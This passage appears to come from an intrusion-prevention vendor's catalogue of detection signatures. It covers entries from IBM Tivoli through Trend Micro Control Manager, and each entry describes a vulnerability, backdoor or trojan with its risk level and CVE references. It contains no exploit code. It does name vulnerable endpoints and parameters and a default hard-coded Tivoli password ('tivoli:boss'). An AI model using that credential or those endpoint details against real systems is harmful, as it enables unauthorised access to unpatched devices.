A Tivoli Endpoint Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-715-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM Tivoli Endpoint Manager

Type:

Buffer Overflow

Description:

A stack based buffer overflow vulnerability in IBM Tivoli Endpoint Manager, versions 3.7.1, 4.1, 4.1.1, and 4.3.1, in lcfd.exe, which allows remote authenticated users to execute arbitrary code via a long opts field. This fingerprint also covers the use of the default hard-coded password tivoli:boss.

Situation:

HTTP_CS-Tivoli-Endpoint-Buffer-Overflow

References:

CVE-2011-1220
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1220

BID-48049
http://www.securityfocus.com/bid/48049

OSVDB-72713
http://www.osvdb.org/72713

Tnftp-Redirection-Command-Execution-CVE-2014-8517

About this vulnerability:

A vulnerability in tnftp

Risk:

Moderate

First detected in:

sgpkg-ips-614-5211

Last changed:

sgpkg-ips-1867-5242

Platform:

Generic

Software:

Tnftp

Type:

Input Validation

Description:

A command execution vulnerability exists in NetBSD tnftp prior to version tnftp-20141031. This vulnerability is due to insufficient validation in redirection path parsing.

Situation:

HTTP_SHS-Tnftp-Redirection-Command-Execution-CVE-2014-8517

References:

CVE-2014-8517
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8517

TNS_Oracle-Database-Server-XDB-Pitrig_truncate-Procedure-Buffer-Overflow

About this vulnerability:

A vulnerability in Oracle Database Server

Risk:

High

First detected in:

sgpkg-ips-140-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Database; Oracle Application Server

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in Oracle Database Server product. The vulnerability exists due to insufficient validation of arguments supplied to procedure PITRIG_TRUNCATE in XDB.XDB_PITRIG_PKG package. A remote attacker with valid user credentials may leverage this vulnerability to execute arbitrary code within the security context of the affected service.

Situation:

Generic_CS-Oracle-Database-Server-XDB-Pitrig-truncate-Procedure-Buffer-Overflow
TNS_Oracle-Database-Server-XDB-Pitrig-truncate-Procedure-Buffer-Overflow

References:

CVE-2008-0339
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0339

BID-27229
http://www.securityfocus.com/bid/27229

Tofu-Backdoor

About this vulnerability:	Tofu Backdoor
Risk:	High
First detected in:	sgpkg-ips-859-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Backdoor
Description:	Tofu is a proxy-aware backdoor.
Situation:	HTTP_CSH-Tofu-Backdoor-Request

Tom-Sawyer-Get-Extension-Factory-Object-Instantiation-MemCorrupt

About this vulnerability:

An attempt to exploit a vulnerability in Tom Sawyer GET Extension Factory COM object

Risk:

Moderate

First detected in:

sgpkg-ips-395-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

EMC VMware VI Client

Type:

Malfunction

Description:

A code execution vulnerability has been reported in the Tom Sawyer GET Extension Factory COM object. The vulnerability is due to an error while instantiating the ActiveX control in a browser. This control was not meant to be used within a browser. As such, an attempt to instantiate it will cause it to initialize incorrectly, leading to memory corruption.

Situation:

HTTP_SS-Tom-Sawyer-Get-Extension-Factory-Object-Instantiation-MemCorrupt
File-Text_Tom-Sawyer-Get-Extension-Factory-Object-Instantiation-MemCorrupt

References:

CVE-2011-2217
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2217

BID-48099
http://www.securityfocus.com/bid/48099

Tomato-Trojan-Infection-Traffic

About this vulnerability:	Tomato trojan infection traffic
Risk:	High
First detected in:	sgpkg-ips-1357-5242
Last changed:	sgpkg-ips-1357-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Tomato trojan infection traffic was detected.
Situation:	HTTP_CSU-Tomato-Trojan-Infection-Traffic

TomcatAJP-Request-Smuggling-CVE-2022-26377

About this vulnerability:

An attempt to exploit a vulnerability in Tomcat AJP detected

Risk:

High

First detected in:

sgpkg-ips-1645-5242

Last changed:

sgpkg-ips-1645-5242

Platform:

Generic

Software:

Apache Tomcat

Type:

Input Validation

Description:

Inconsistent Interpretation of HTTP Requests ("HTTP Request Smuggling") vulnerability in "mod_proxy_ajp" of Apache HTTP Server allows an attacker to smuggle requests to the AJP server it forwards requests to. This issue affects Apache HTTP Server Apache HTTP Server 2.4 version 2.4.53 and prior versions.

Situation:

File-Binary_TomcatAJP-Request-Smuggling

References:

CVE-2022-26377
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26377

TOR-Network-Usage

About this vulnerability:	Detects TOR network usage
Risk:	Low
First detected in:	sgpkg-ips-99-1314
Last changed:	sgpkg-ips-1578-5242
Platform:	Generic
Software:	TOR client; Vidalia; Pivoxy
Type:	Browser
Description:	Detects TOR network usage.
Situation:	TLS_CS-TOR-Meek-Domain-Fronting TLS_CS-Possible-Psiphon-Meek-Domain-Fronting TLS-SNI_Suspicious-Server-Name-Indication TLS-SNI_Snowflake-Proxy

Total-JS-CMS-12-Widget-JavaScript-Code-Injection

About this vulnerability:

A vulnerability in Total.js CMS

Risk:

High

First detected in:

sgpkg-ips-1199-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux; Mac OS X

Software:

Total.js

Type:

Javascript Injection

Description:

A vulnerability in Total.js CMS 12.0.0 which allows remote attackers to execute arbitrary code by creating a malicious widget with a special tag containing JavaScript code.

Situation:

HTTP_CRL-Total-JS-CMS-12-Widget-JavaScript-Code-Injection

References:

CVE-2019-15954
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15954

Totolink-N600R-exportOvpn-Command-Injection-CVE-2022-26186

About this vulnerability:

A vulnerability in Totolink N600R

Risk:

High

First detected in:

sgpkg-ips-1536-5242

Last changed:

sgpkg-ips-1536-5242

Platform:

Generic

Software:

Totolink

Type:

Input Validation

Description:

A command injection vulnerability has been reported in the Totolink N600R wireless router. An unauthenticated attacker can use this vulnerability to execute arbitrary commands via HTTP requests to cstecgi.cgi.

Situation:

HTTP_CRL-Totolink-N600R-exportOvpn-Command-Injection-CVE-2022-26186

References:

CVE-2022-26186
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26186

Totolink-Routers-Multiple-Command-Injection-Vulnerabilities

About this vulnerability:

A vulnerability in Totolink

Risk:

High

First detected in:

sgpkg-ips-1501-5242

Last changed:

sgpkg-ips-1648-5242

Platform:

Generic

Software:

Totolink

Type:

Input Validation

Description:

Multiple similar command injection vulnerabilities have been reported in various Totolink routers. This situation covers attempts to exploit CVE-2021-43711, CVE-2022-25075, CVE-2022-25076, CVE-2022-25077, CVE-2022-25078, CVE-2022-25079, CVE-2022-25080, CVE-2022-25081, CVE-2022-25082, CVE-2022-25083, and CVE-2022-25084. An unauthenticated attacker can use these vulnerabilities to execute arbitrary code via GET requests to downloadFlile.cgi program.

Situation:

HTTP_CSU-Totolink-Routers-Multiple-Command-Injection-Vulnerabilities

References:

CVE-2022-25075
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25075

Totolink-setupgradefw-Command-Injection-CVE-2022-26210

About this vulnerability:

A vulnerability in Totolink wireless routers

Risk:

High

First detected in:

sgpkg-ips-1537-5242

Last changed:

sgpkg-ips-1537-5242

Platform:

Generic

Software:

Totolink

Type:

Input Validation

Description:

A command injection vulnerability has been reported in Totolink A830R, A3100R, A950RG, A800R, A3000RU, and A810R wireless routers. An unauthenticated attacker can use this vulnerability to execute arbitrary commands via HTTP requests to cstecgi.cgi.

Situation:

File-Text_Totolink-setupgradefw-Command-Injection-CVE-2022-26210

References:

CVE-2022-26210
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26210

Totolink-Wireless-Routers-Unauthenticated-RCE-Vulnerability

About this vulnerability:

A vulnerability in a Totolink Wireless Router detected

Risk:

High

First detected in:

sgpkg-ips-1652-5242

Last changed:

sgpkg-ips-1652-5242

Platform:

Generic

Software:

Totolink

Type:

Input Validation

Description:

A vulnerability in multiple Totolink Wireless Router products that allows remote attackers to execute arbitrary code through the "command" parameter, in setting/setTracerouteCfg.

Situation:

HTTP_CRL-Totolink-Wireless-Routers-Unauthenticated-RCE-Vulnerability

References:

CVE-2023-30013
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30013

TP-Link-Archer-A7-tdpServer-Command-Injection

About this vulnerability:

A vulnerability in TP-Link Archer A7 routers.

Risk:

High

First detected in:

sgpkg-ips-1368-5242

Last changed:

sgpkg-ips-1368-5242

Platform:

Linux

Software:

TP-Link

Type:

Input Validation

Description:

A vulnerability in TP-Link Archer A7 routers, in the tdpServer service, which allows remote attackers to execute arbitrary commands vie the slave_mac parameter.

Situation:

Generic_UDP-TP-Link-Archer-A7-tdpServer-Command-Injection

References:

CVE-2020-10882
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10882

TP-Link-Archer-AX21-Command-Injection-CVE-2023-1389

About this vulnerability:

A vulnerability in TP-Link Archer AX21

Risk:

High

First detected in:

sgpkg-ips-1582-5242

Last changed:

sgpkg-ips-1582-5242

Platform:

Generic

Software:

TP-Link

Type:

Input Validation

Description:

A command injection vulnerability has been reported in the firmware of TP-Link Archer AX21 routers. An unauthenticated attacker could use this vulnerability to execute arbitrary OS commands as root.

Situation:

HTTP_CRL-TP-Link-Archer-AX21-Command-Injection-CVE-2023-1389

References:

CVE-2023-1389
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1389

TP-Link-Cloud-Cameras-NCXXX-Bonjour-Command-Injection

About this vulnerability:

A vulnerability in TP-LINK Cloud Cameras

Risk:

High

First detected in:

sgpkg-ips-1297-5242

Last changed:

sgpkg-ips-1297-5242

Platform:

Generic

Software:

TP-Link

Type:

Input Validation

Description:

TP-LINK Cloud Cameras including products NC200, NC210, NC220, NC230, NC250, NC260, and NC450 suffer from a command injection vulnerability.

Situation:

HTTP_CRL-TP-Link-Cloud-Cameras-NCXXX-Bonjour-Command-Injection

References:

CVE-2020-12109
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12109

TP-Link-Directory-Traversal

About this vulnerability:

A TP-Link Directory Traversal vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-704-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

TP-Link

Type:

Directory Traversal

Description:

A vulnerability in TP-Link TL-WA701N and TL-WA701ND which allows remote attackers to perform directory traversals and execute HTML injections due to the insufficient user-supplied input validation.

Situation:

HTTP_CSU-TP-Link-Local-File-Disclosure-CVE-2015-3035

References:

CVE-2012-5687
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5687

BID-57969
http://www.securityfocus.com/bid/57969

OSVDB-86881
http://www.osvdb.org/86881

TP-Link-Local-File-Disclosure-CVE-2015-3035

About this vulnerability:

A vulnerability in TP-Link routers

Risk:

High

First detected in:

sgpkg-ips-1467-5242

Last changed:

sgpkg-ips-1467-5242

Platform:

Generic

Software:

TP-Link

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported in multiple TP-Link products, including Archer C5, C7, C8, and C9 routers. Successful exploitation of this vulnerability can result in local file disclosure.

Situation:

References:

CVE-2015-3035
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3035

TP-Link-Tapo-C200-IP-Camera-Command-Injection-CVE-2021-4045

About this vulnerability:

A vulnerability in TP-Link Tapo C200 IP camera

Risk:

High

First detected in:

sgpkg-ips-1501-5242

Last changed:

sgpkg-ips-1501-5242

Platform:

Generic

Software:

TP-Link

Type:

Input Validation

Description:

A command injection vulnerability has been reported in TP-Link Tapo C200 IP cameras. The vulnerability is due to insufficient validation of user input and it may allow unauthenticated attackers to execute arbitrary code.

Situation:

HTTP_CRL-TP-Link-Tapo-C200-IP-Camera-Command-Injection-CVE-2021-4045

References:

CVE-2021-4045
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4045

TP-Link-TL-WR1043N-Cross-Site-Request-Forgery

About this vulnerability:

A vulnerability in TP-Link WR1043N router firmware

Risk:

High

First detected in:

sgpkg-ips-1788-5242

Last changed:

sgpkg-ips-1788-5242

Platform:

Generic

Software:

TP-Link

Type:

Malfunction

Description:

A cross-site request forgery vulnerability has been reported in the TP-Link WR1043N router firmware version TL-WR1043ND_V1_120405.

Situation:

File-Text_TP-Link-TL-WR1043N-Cross-Site-Request-Forgery

References:

CVE-2013-2645
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2645

TP-Link-TLWR840N-Command-Injection-CVE-2022-25060

About this vulnerability:

An attempt to exploit a vulnerability in TP-Link TL-WR840N detected

Risk:

High

First detected in:

sgpkg-ips-1500-5242

Last changed:

sgpkg-ips-1500-5242

Platform:

Generic

Software:

TP-Link

Type:

Code Injection

Description:

A command injection vulnerability has been reported in TP-Link TL-WR840N wireless router.

Situation:

HTTP_CRL-TP-Link-TLWR840N-Command-Injection-CVE-2022-25060

References:

CVE-2022-25060
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25060

TP-Link-WR940N-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in TP-Link WR940N routers

Risk:

High

First detected in:

sgpkg-ips-1385-5242

Last changed:

sgpkg-ips-1385-5242

Platform:

Generic

Software:

TP-Link

Type:

Buffer Overflow

Description:

There exists a stack buffer overflow vulnerability in TP-Link WR940N router hardware version 4. Successful exploitation of this vulnerability can allow remote authenticated attackers to execute arbitrary code.

Situation:

HTTP_CRL-TP-Link-WR940N-Stack-Buffer-Overflow

References:

CVE-2017-13772
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13772

Traccar-Path-Traversal-CVE-2024-24809

About this vulnerability:

A vulnerability in Traccar

Risk:

Moderate

First detected in:

sgpkg-ips-1794-5242

Last changed:

sgpkg-ips-1830-5242

Platform:

Generic

Software:

Traccar

Type:

Input Validation

Description:

A path traversal vulnerability in Traccar allows an attacker to perform registration on the service.

Situation:

HTTP_CSH-Traccar-Path-Traversal-CVE-2024-24809

References:

CVE-2024-24809
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24809

Trace-Mode-UDP-Denial-Of-Service-1-Ver1

About this vulnerability:	A vulnerability in Trace Mode allowing denial of service
Risk:	High
First detected in:	sgpkg-ips-617-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Trace Mode
Type:	Malfunction
Description:	A vulnerability exists in Trace Mode where an attacker could send a custom UDP packets causing a denial of service condition causing a system crash.
Situation:	Generic_UDP-Trace-Mode-UDP-Denial-Of-Service-1-Ver1

Trace-Mode-UDP-Denial-Of-Service-1-Ver2

About this vulnerability:	A vulnerability in Trace Mode allowing denial of service
Risk:	High
First detected in:	sgpkg-ips-617-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Trace Mode
Type:	Malfunction
Description:	A vulnerability exists in Trace Mode where an attacker could send a custom UDP packets causing a denial of service condition causing a system crash.
Situation:	Generic_UDP-Trace-Mode-UDP-Denial-Of-Service-1-Ver2

Trace-Mode-UDP-Denial-Of-Service-1-Ver3

About this vulnerability:	A vulnerability in Trace Mode allowing denial of service
Risk:	High
First detected in:	sgpkg-ips-617-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Trace Mode
Type:	Malfunction
Description:	A vulnerability exists in Trace Mode where an attacker could send a custom UDP packets causing a denial of service condition causing a violation of service.
Situation:	Generic_UDP-Trace-Mode-UDP-Denial-Of-Service-1-Ver3

Trace-Mode-UDP-Denial-Of-Service-1-Ver4

About this vulnerability:	A vulnerability in Trace Mode allowing denial of service
Risk:	High
First detected in:	sgpkg-ips-617-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Trace Mode
Type:	Malfunction
Description:	A vulnerability exists in Trace Mode where an attacker could send a custom UDP packets causing a denial of service condition causing a violation of service.
Situation:	Generic_UDP-Trace-Mode-UDP-Denial-Of-Service-1-Ver4

Trace-Mode-UDP-Denial-Of-Service-2

About this vulnerability:	A vulnerability in Trace Mode allowing denial of service.
Risk:	High
First detected in:	sgpkg-ips-617-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Trace Mode
Type:	Malfunction
Description:	A vulnerability exists in Trace Mode where an attacker could send a custom UDP packets causing a denial of service condition causing a crash of the runtime monitor.
Situation:	Generic_CS-Trace-Mode-UDP-Denial-Of-Service-2

TrackerCam-Server-Php-Script-Argument-BOF

About this vulnerability:

Buffer overflow in TrackerCam server

Risk:

Moderate

First detected in:

sgpkg-ips-402-4219

Last changed:

sgpkg-ips-1589-5242

Platform:

Windows

Software:

TrackerCam

Type:

Buffer Overflow

Description:

TrackerCam server contains a buffer overflow that can be exploited via a long argument to an arbitrary PHP script on the server. A remote attacker could exploit this vulnerability to cause a denial of service or to execute arbitrary code on the server.

Situation:

HTTP_CRL-TrackerCam-Server-Php-Script-Argument-BOF

References:

CVE-2005-0478
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0478

BID-12592
http://www.securityfocus.com/bid/12592

OSVDB-13953
http://www.osvdb.org/13953

Translate-F-MS00-058

About this vulnerability:

MS00-058 Translate header allows file disclosure

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IIS 5.0

Type:

Malfunction

Description:

It is possible to view the source code of .asp files and other server side scripts by requesting the files with a special "Translate" header. A successful attack may leak sensitive information to the attacker and possibly allow more severe attacks that may lead into a system compromise.

Situation:

HTTP_CS-Translate-F-MS00-58-Sourcecode-Disclosure-Attempt

References:

CVE-2000-0778
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0778

BID-1578
http://www.securityfocus.com/bid/1578

MS00-058
http://technet.microsoft.com/security/bulletin/MS00-058

Treasure-Data-Digdag-Getfile-Directory-Traversal

About this vulnerability:

A vulnerability in Treasure Data Digdag

Risk:

Moderate

First detected in:

sgpkg-ips-1718-5242

Last changed:

sgpkg-ips-1718-5242

Platform:

Generic

Software:

Digdag

Type:

Input Validation

Description:

A directory traversal vulnerability has been reported in Treasure Data Digdag. The vulnerability is due to improper validation of API request parameters. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in reading arbitrary files on the target filesystem.

Situation:

HTTP_CSU-Treasure-Data-Digdag-Getfile-Directory-Traversal

References:

CVE-2024-25125
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25125

Trellian-FTP-Client-Remote-Buffer-Overflow

About this vulnerability:

A Trellian FTP Client Remote Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-721-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP

Software:

Trellian FTP Client

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Trellian FTP Client, versions 3.01 including 3.1.3.1789, which allows remote attackers to execute arbitrary code via a long PASV response.

Situation:

FTP_SS-Trellian-FTP-Client-Remote-Buffer-Overflow

References:

CVE-2010-1465
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1465

OSVDB-63812
http://www.osvdb.org/63812

Trend-Micro-AntiVirus-Password-Manager-Command-Execution

About this vulnerability:	A vulnerability in Trend Micro Antivirus Password Manager
Risk:	High
First detected in:	sgpkg-ips-725-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Trend Micro Antivirus Password Manager
Type:	Malfunction
Description:	There exists a design weakness in Trend Micro Antivirus Password Manager. A remote attacker can exploit this to access sensitive information and execute arbitrary code.
Situation:	File-Text_Trend-Micro-AntiVirus-Password-Manager-Command-Execution

Trend-Micro-Apex-One-And-OfficeScan-CVE-2020-8470-Directory-Traversal

About this vulnerability:

A vulnerability in Trend Micro Apex One

Risk:

Moderate

First detected in:

sgpkg-ips-1243-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Trend Micro Apex One; Trend Micro OfficeScan

Type:

Directory Traversal

Description:

Improper validation of user-supplied file names in HTTP requests causes a directory traversal vulnerability in Trend Micro OfficeScan. A successful exploit may allow an attacker to delete files using system privileges.

Situation:

HTTP_CRL-Trend-Micro-Apex-One-And-OfficeScan-CVE-2020-8470-Directory-Traversal

References:

CVE-2020-8470
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8470

Trend-Micro-Apex-One-And-OfficeScan-Directory-Traversal

About this vulnerability:

A vulnerability in Trend Micro Apex One

Risk:

Moderate

First detected in:

sgpkg-ips-1241-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Trend Micro Apex One; Trend Micro OfficeScan

Type:

Directory Traversal

Description:

There has been reported a directory traversal vulnerability in Trend Micro Apex One and OfficeScan. Successful exploitation could lead in remote code execution.

Situation:

HTTP_CRH-Trend-Micro-Apex-One-And-OfficeScan-Directory-Traversal

References:

CVE-2020-8599
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8599

Trend-Micro-Control-Manager-Ad-Hoc-Query-Module-SQL-Injection

About this vulnerability:

A vulnerability in Trend Micro Control Manager

Risk:

Moderate

First detected in:

sgpkg-ips-483-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Trend Micro Control Manager

Type:

Input Validation

Description:

There is an SQL injection vulnerability in Trend Micro Control Manager. The vulnerability is due to insufficient input validation on user queries by the ad hoc query module. A remote, authenticated attacker could exploit this vulnerability by sending crafted "id" parameter in the GET request for AdHocQuery_Processor.aspx page. A successful exploitation attempt could result in the execution of SQL commands under the context of the SYSTEM user.

Situation:

HTTP_CRL-Trend-Micro-Control-Manager-Ad-Hoc-Query-Module-SQL-Injection

References:

CVE-2012-2998
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2998

OSVDB-85807
http://www.osvdb.org/85807

Trend-Micro-Control-Manager-Adhocquery-Getproductcategory-SQL-Injection

About this vulnerability:

A vulnerability in Trend Micro Control Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1082-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Trend Micro Control Manager

Type:

Input Validation

Description:

Improper validation of user-supplied input for the SelectNodeID HTTP parameter within GetProductCategory method called from AdHocQuery_Processor.aspx causes an SQL injection vulnerability in Trend Micro Control Manager. A successful exploit allows an attacker to run arbitrary code with the privileges of the service.

Situation:

HTTP_CRL-Trend-Micro-Control-Manager-Adhocquery_Processor-Getproductcategory-SQL-Injection

References:

CVE-2018-3602
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3602

Trend-Micro-Control-Manager-Adhocquery_Processor.aspx-SQL-Injection

About this vulnerability:	A vulnerability in Trend Micro Control Manager
Risk:	Moderate
First detected in:	sgpkg-ips-798-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Trend Micro Control Manager
Type:	Input Validation
Description:	Improper validation of HTTP requests causes an SQL injection vulnerability in Trend Micro Control Manager. A successful exploitation allows an attacker to run arbitrary code on the target system.
Situation:	HTTP_CRL-Trend-Micro-Control-Manager-Adhocquery_Processor.aspx-SQL-Injection

Trend-Micro-Control-Manager-Cmdhandlerlicensemanager-SQL-Injection

About this vulnerability:

A vulnerability in Trend Micro Control Manager

Risk:

Moderate

First detected in:

sgpkg-ips-970-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Trend Micro Control Manager

Type:

Input Validation

Description:

Improper validation of the user-supplied input for cmdHandlerLicenseManager.dll causes an SQL injection vulnerability in Trend Micro Control Manager. A successful exploit may allow code execution in addition to SQL access.

Situation:

Generic_CS-Trend-Micro-Control-Manager-Cmdhandlerlicensemanager-SQL-Injection

References:

CVE-2017-11384
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11384

Trend-Micro-Control-Manager-cmdHandlerStatusMonitor-SQL-Injection

About this vulnerability:

A Trend Micro Control Manager cmdHandlerStatusMonitor SQL Injection vulnerability

Risk:

High

First detected in:

sgpkg-ips-983-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Trend Micro Control Manager

Type:

SQL Injection

Description:

An SQL injection vulnerability in Trend Micro Control Manager, versions 6.0 prior to SP3 Patch 3, which allows remote attacker to execute arbitrary code by sending a crafted request to the target server, due to the improper validation of input to cmdHandlerStatusMonitor.dll and DMServer.exe.

Situation:

Generic_CS-Trend-Micro-Control-Manager-cmdHandlerStatusMonitor-SQL-Injection

References:

CVE-2017-11385
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11385

Trend-Micro-Control-Manager-Cmdhandlertvcscommander-SQL-Injection

About this vulnerability:

A vulnerability in Trend Micro Control Manager

Risk:

Moderate

First detected in:

sgpkg-ips-986-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Trend Micro Control Manager

Type:

Input Validation

Description:

Improper validation of user input causes an SQL Injection vulnerability in Trend Micro Control Manager. A successfull exploit allows an attacker to execute arbitrary code on the target system.

Situation:

Generic_CS-Trend-Micro-Control-Manager-Cmdhandlertvcscommander-SQL-Injection

References:

CVE-2017-11383
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11383

Trend-Micro-Control-Manager-Cmdprocessor.exe-Addtask-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Trend Micro Control Manager

Risk:

Moderate

First detected in:

sgpkg-ips-438-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Trend Micro Control Manager

Type:

Buffer Overflow

Description:

There is a stack buffer overflow vulnerability in Trend Micro Control Manager. The vulnerability is caused by copying of user-controlled data to a fixed-length buffer without sufficient validation. A remote, unauthenticated attacker can exploit this vulnerability by sending crafted packet(s) to the CmdProcessor.exe component on TCP ports 20101 and 20102. A successful exploitation attempt could result in execution of arbitrary code within the security context of the Trend Micro Control Manager process.

Situation:

Generic_CS-Trend-Micro-Control-Manager-Cmdprocessor-Addtask-Buffer-Overflow

References:

CVE-2011-5001
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-5001

OSVDB-77585
http://www.osvdb.org/77585

Trend-Micro-Control-Manager-Cross-Site-Request-Forgery

About this vulnerability:	A vulnerability in Trend Micro Control Manager
Risk:	Moderate
First detected in:	sgpkg-ips-407-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Trend Micro Control Manager
Type:	Input Validation
Description:	A cross site request forgery vulnerability exists in Trend Micro Control Manager. An attacker craft a url that when followed by a user can insert arbitrary records into the database, including user accounts and administrator privileges. A remote attacker can exploit this vulnerability by enticing a user to follow crafted URI, upon successful exploitation the attacker can login to the administrator console with the created account and execute commands with the privileges of the affected service.
Situation:	HTTP_SS_Trend-Micro-Control-Manager-Cross-Site-Request-Forgery File-Text_Trend-Micro-Control-Manager-Cross-Site-Request-Forgery

Trend-Micro-Control-Manager-DLP_policy.php-Directory-Traversal

About this vulnerability:	A vulnerability in Trend Micro Control Manager
Risk:	High
First detected in:	sgpkg-ips-859-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Trend Micro Control Manager
Type:	Input Validation
Description:	There exists a directory traversal vulnerability in Trend Micro Control Manager. A remote, unauthenticated attacker can use this to execute code on the affected system.
Situation:	HTTP_CRL-Trend-Micro-Control-Manager-DLP_policy.php-Directory-Traversal

Trend-Micro-Control-Manager-Download.php-Information-Disclosure

About this vulnerability:	A vulnerability in Trend Micro Control Manager
Risk:	High
First detected in:	sgpkg-ips-857-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Trend Micro Control Manager
Type:	Malfunction
Description:	There exists an information disclosure vulnerability in Trend Micro Control Manager. A remote, unauthenticated attacker can use this to read arbitrary files on the target server.
Situation:	HTTP_CSU-Trend-Micro-Control-Manager-Download.php-Information-Disclosure

Trend-Micro-Control-Manager-Lang-Parameter-Arbitrary-File-Inclusion

About this vulnerability:	A vulnerability in Trend Micro Control Manager
Risk:	Moderate
First detected in:	sgpkg-ips-864-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Trend Micro Control Manager
Type:	Directory Traversal
Description:	Improper sanitization of HTTP requests causes an arbitrary file inclusion vulnerability in Trend Micro Control Manager. A successful exploit allows an attacker to import and run their own code with the privileges of the server process.
Situation:	HTTP_CRL-Trend-Micro-Control-Manager-Lang-Parameter-Arbitrary-File-Inclusion

Trend-Micro-Control-Manager-Producttree-XML-External-Entity-Processing

About this vulnerability:	A vulnerability in Trend Micro Control Manager
Risk:	Moderate
First detected in:	sgpkg-ips-863-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Trend Micro Control Manager
Type:	Input Validation
Description:	An XML external entity (XXE) processing vulnerability has been reported in Trend Micro Control Manager. The vulnerability is due to lack of validation of user-supplied input prior to executing an XML query in ProductTree_RightWindow.aspx. A remote, authenticated attacker could exploit this vulnerability by sending a malicious HTTP request to the target system. Successful exploitation could allow the attacker to read arbitrary files from the target system.
Situation:	HTTP_CS-Trend-Micro-Control-Manager-Producttree_Rightwindow-XML-External-Entity-Processing

Trend-Micro-Control-Manager-Scloudservice-Getpassword-SQL-Injection

About this vulnerability:

A vulnerability in Trend Micro Control Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1077-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Trend Micro Control Manager

Type:

Input Validation

Description:

There has been reported an SQL injection vulnerability in the Trend Micro Control Manager. A remote unauthenticated attacker could exploit this vulnerability by sending maliciously crafted requests to the target server. Successful exploitation could lead to arbitrary code execution.

Situation:

HTTP_CRL-Trend-Micro-Control-Manager-Scloudservice-Getpassword-SQL-Injection

References:

CVE-2018-3604
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3604

